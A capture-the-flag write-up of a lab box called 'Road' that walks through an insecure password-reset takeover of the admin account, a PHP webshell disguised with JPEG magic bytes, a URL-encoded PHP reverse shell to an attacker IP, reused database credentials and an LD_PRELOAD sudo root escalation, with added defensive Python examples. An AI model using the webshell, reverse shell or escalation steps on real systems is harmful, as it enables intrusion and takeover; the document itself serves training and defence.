Road

[Screenshot]

Target IP: 10.10.148.116
Challenge Description: As usual, obtain the user and root flag.


Reconnaissance

[Screenshot: nmap scan showing two open TCP ports, SSH and HTTP]
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.

[Screenshot: aggressive nmap scan of the open TCP ports]
An aggressive port scan against the open TCP ports returns the result above. The HTTP application on port 80 looks interesting.


Enumeration

Port 80: HTTP
[Screenshot: web application home page]
The webpage above is displayed for this web application.

[Screenshot: page source revealing /v2/admin/login.html]
I performed source-code scanning, and found the login page at http://10.10.148.116/v2/admin/login.html as shown above.

[Screenshot: login page with a registration option]
And browsing to http://10.10.148.116/v2/admin/login.html displays the login webpage above. I sprayed different default credentials, such as admin:admin and root:root, but I had no luck. However, I noticed it is possible to register an account on this web application.

[Screenshot: account registration form]
I tried to create an account using the details above. After pressing the Register button, I got a successful confirmation!

[Screenshot: dashboard after logging in]
I logged into the web application using the credentials I registered with. The webpage above is shown after logging in.

[Screenshot: profile page showing that only admin can change the profile picture, and the admin email admin@sky.thm]
After some enumeration, I found the interesting information above. I tried to change the profile picture of the new user to see if I can upload a webshell, but I had no luck; however, the admin user has access to this feature! I even obtained the email of the admin user which is admin@sky.thm, as shown above.

[Screenshot: password-change form]
Why does this web application allow users to change their password directly? Maybe I can change the password of the user admin as I have their email address?

[Screenshot: intercepted POST request in Burp Suite with the email field changed to admin@sky.thm]
Using Burp Suite, I intercepted the POST request to change the password of the new user I created. And then I changed the email field to admin@sky.thm as shown above.

[Screenshot: password changed confirmation message]
After forwarding this request, I got the message above. It looks like the password of user admin@sky.thm has been changed to test.

[Screenshot: logged in as admin]
And bingo! I successfully logged in as the user admin as shown above. I should be able to change the profile picture now.
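The password-change handler on this box trusted the email field in the request body, which is why the intercepted POST could reset admin@sky.thm. The following is an added example, not code from the challenge or this write-up, showing that handler beside a fixed version that takes the account from the authenticated session and records a mismatch as a tampering signal; the user store, field names and function names are constructed.

```python
# Added example (not code from the challenge or the write-up): a
# password-change handler that trusts the client-supplied email, beside
# one that derives the account from the session and logs tampering.
# The user store and form field names are constructed.

def change_password_vulnerable(users, session_email, form):
    """Vulnerable: the target account comes from the form body, so any
    logged-in user can reset any other account's password."""
    target = form["email"]              # attacker-controlled (editable in Burp)
    if target not in users:
        return "unknown user"
    users[target]["password"] = form["new_password"]
    return "password changed"

def change_password_fixed(users, session_email, form, audit_log):
    """Fixed: the account is the authenticated session's own. A form
    email that disagrees with the session is refused and recorded,
    because a legitimate client never sends one."""
    submitted = form.get("email")
    if submitted and submitted != session_email:
        audit_log.append(
            f"ALERT password change for {submitted} requested by session {session_email}")
        return "forbidden"
    users[session_email]["password"] = form["new_password"]
    return "password changed"
```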

[Screenshot: php.jpg.phtml opened in a hex editor]
I created a simple PHP webshell called php.jpg.phtml. This contains the code aaaa<?php echo system($_GET['cmd']);?>. There are four a's at the beginning because I will be using hexeditor to input the magic bytes of the JPG header. And I added the FFD8FFE0 bytes at the beginning using hexeditor.

[Screenshot: file output reporting JPEG image data, and the upload succeeding]
After doing this, running file against the PHP webshell shows it is JPEG image data. This is done to bypass any filtering that is in place on the target system. And then I successfully uploaded this PHP webshell via the change profile picture feature. But where has my webshell been uploaded to?

[Screenshot: profile.php source showing the /v2/profileimages/ path]
As shown above, apparently the profile picture images are uploaded to /v2/profileimages/. I found this when viewing the source-code of the profile.php PHP file.

[Screenshot: webshell reachable under /v2/profileimages/]
And bingo! Browsing to http://10.10.148.116/v2/profileimages/ states Directory listing is diabled.. But inputting the full file name and location provides me access to my webshell, as shown above. I can use the webshell to perform RCE. Time to upgrade this to a reverse shell connection.
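The upload check on this box was satisfied by four bytes of forged JPEG header, and the server then executed the file because its name ended in .phtml. As an added example (not code from the challenge or the write-up), the validator below rejects that exact file in three independent ways: it allows exactly one extension from an allowlist, ties the magic bytes to that extension, and refuses bodies carrying a PHP open tag. The function name and sample inputs are constructed.

```python
# Added example (not code from the challenge or the write-up): a
# profile-picture validator that is not fooled by a forged magic-byte
# header. All sample inputs are constructed.
import re

# Each allowed extension with the header bytes it must start with.
MAGIC_FOR_EXT = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def validate_image_upload(filename, data):
    """Return (ok, reason) for an uploaded profile picture."""
    parts = filename.lower().split(".")
    # 'php.jpg.phtml' has two extensions and the server mapped the last
    # one to PHP, so require exactly one extension.
    if len(parts) != 2:
        return False, "exactly one extension required"
    name, ext = parts
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", name):
        return False, "bad characters in filename"
    if ext not in MAGIC_FOR_EXT:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(m) for m in MAGIC_FOR_EXT[ext]):
        return False, f"header does not match .{ext}"
    # A header is trivial to forge with a hex editor, so also refuse
    # bodies containing a PHP open tag. This is best effort: the
    # allowlist above and serving uploads as static files are the
    # controls that actually matter.
    if re.search(rb"<\?(php|=)", data, re.IGNORECASE):
        return False, "embedded PHP open tag"
    return True, "ok"

# The file from the write-up: FFD8FFE0 prepended to 'aaaa' plus a webshell.
FORGED = b"\xff\xd8\xff\xe0aaaa<?php echo system($_GET['cmd']);?>"
# A constructed genuine-looking JPEG start (SOI followed by an APP0/JFIF marker).
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
```

`file` would call FORGED a JPEG just as it did in the write-up; the validator still rejects it by name and by content.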


Exploitation

[Screenshot: reverse shell received as www-data]
Now I have a foothold on the target machine with the session as www-data. I started a listener on my machine at port 8443. Since the target machine is already using PHP, I deployed the URL-encoded PHP reverse shell script php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bexec%28%22bash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the webshell as shown above.


Privilege Escalation

[Screenshot: hard-coded MySQL credentials in PHP source]
I noticed the credentials root:ThisIsSecurePassword! are hard-coded in some PHP files. Maybe I can access the MySQL application?

[Screenshot: MySQL session as root, showing the SKY database]
Using the credentials root:ThisIsSecurePassword!, I logged in to the MySQL application as the user root as shown above. There is an interesting database called SKY. However, I did not find anything useful here. I tried to spray this password against the user webdeveloper, but I had no luck.

[Screenshot: ps output showing the mongodb process]
Running the command ps -auxw shows the mongodb entry above. There is a Mongo database running on the target machine.

[Screenshot: mongo shell showing the backup database and the user collection]
Using the command mongo, I started the mongo database application. I ran the command show databases and it showed me four different databases. After enumerating for some time, I found backup to be the most interesting. This database contains a table called user. And this table contains the password BahamasChapp123!@# of the user webdeveloper, who is also a user on this system.

[Screenshot: shell as webdeveloper]
And bingo! I successfully elevated my privileges to the user webdeveloper from www-data using the password BahamasChapp123!@# now.

[Screenshot: sudo -l output including env_keep+=LD_PRELOAD]
Running the command sudo -l shows the information above. The important part is the env_keep+=LD_PRELOAD. This means I can load my own malicious library.

[Screenshot: shell.c created in /tmp]
Over at /tmp, I created the malicious C library file with the name shell.c as shown above.

[Screenshot: compiling shell.so and running sudo with LD_PRELOAD set]
I compiled the code using the command gcc -fPIC -shared -o shell.so shell.c -nostartfiles, as shown above. And then using the command sudo LD_PRELOAD=/tmp/shell.so sky_backup_utility, I obtained a root shell. GG.
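The root shell came from one sudoers line combining env_keep+=LD_PRELOAD with a command webdeveloper may run as root. As an added example (not code from the challenge or the write-up), the audit below parses sudo -l output and reports exactly that combination, so a host check or a baseline review catches it before someone does. The sample output, the NOPASSWD tag and the /usr/bin/sky_backup_utility path are constructed, since the write-up only shows a screenshot.

```python
# Added example (not code from the challenge or the write-up): flag
# sudoers Defaults that preserve loader variables alongside any command
# the user may run as root. Sample output and path are constructed.
import re

# Environment variables that let a sudo caller inject code into the target.
RISKY_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5LIB"}

def audit_sudo_l(text):
    """Parse `sudo -l` output into kept risky env vars and allowed commands."""
    risky, commands, section = [], [], None
    for line in text.splitlines():
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if "may run the following commands" in line:
            section = "commands"
            continue
        if not line.strip():
            section = None
            continue
        if section == "defaults":
            # Defaults are comma separated and may wrap over several lines.
            for opt in line.strip().split(", "):
                m = re.match(r'env_keep\s*\+?=\s*"?([^"]+)"?', opt)
                if m:
                    risky += [v for v in m.group(1).split() if v in RISKY_ENV]
        elif section == "commands":
            # e.g. "(ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility"
            m = re.match(r"\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.*)", line)
            if m:
                commands.append({"runas": m.group(1).strip(),
                                 "tags": m.group(2).strip(),
                                 "command": m.group(3).strip()})
    return {"risky_env_keep": risky, "commands": commands,
            "finding": bool(risky and commands)}

# Constructed sample in the format sudo prints; the real output is only
# visible in the screenshot above.
SAMPLE = """Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
"""
```

The fix on the sudoers side is to drop the env_keep entry (or use a narrow list that never includes loader variables); the audit returns finding=False once it is gone.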


Flags

[Screenshot: user.txt]
The user.txt flag is shown above.

[Screenshot: root.txt]
The root.txt flag is shown above.